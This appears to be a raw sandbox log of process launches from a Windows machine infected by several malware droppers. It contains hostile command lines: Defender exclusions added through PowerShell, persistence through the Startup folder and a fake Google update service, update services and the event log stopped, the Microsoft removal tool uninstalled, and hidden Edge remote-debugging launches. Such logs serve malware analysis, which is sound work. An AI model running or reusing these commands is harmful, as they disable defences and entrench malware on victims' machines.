"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2832,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2852 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2864,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe
"C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd2dd146f8,0x7ffd2dd14708,0x7ffd2dd14718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 560
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 800
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2168 /prefetch:3
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2524 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 868
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1196
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1220
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc [base64-encoded command not preserved in this capture]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 836
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1132
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7612 -ip 7612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 440
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\2863614952.exe
C:\Users\Admin\AppData\Local\Temp\2863614952.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Users\Admin\AppData\Local\Temp\1599224382.exe
C:\Users\Admin\AppData\Local\Temp\1599224382.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9076 -ip 9076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 440
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\1549524169.exe
C:\Users\Admin\AppData\Local\Temp\1549524169.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\1094014616.exe
C:\Users\Admin\AppData\Local\Temp\1094014616.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\32903688.exe
C:\Users\Admin\AppData\Local\Temp\32903688.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1480
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8092 -ip 8092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8092 -s 440
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1136
C:\Users\Admin\AppData\Local\Temp\Files\server.exe
"C:\Users\Admin\AppData\Local\Temp\Files\server.exe"
C:\Users\Admin\AppData\Local\Temp\Files\injector.exe
"C:\Users\Admin\AppData\Local\Temp\Files\injector.exe"
\??\c:\users\admin\appdata\local\temp\files\injector.exe
c:\users\admin\appdata\local\temp\files\injector.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1216
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 508
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
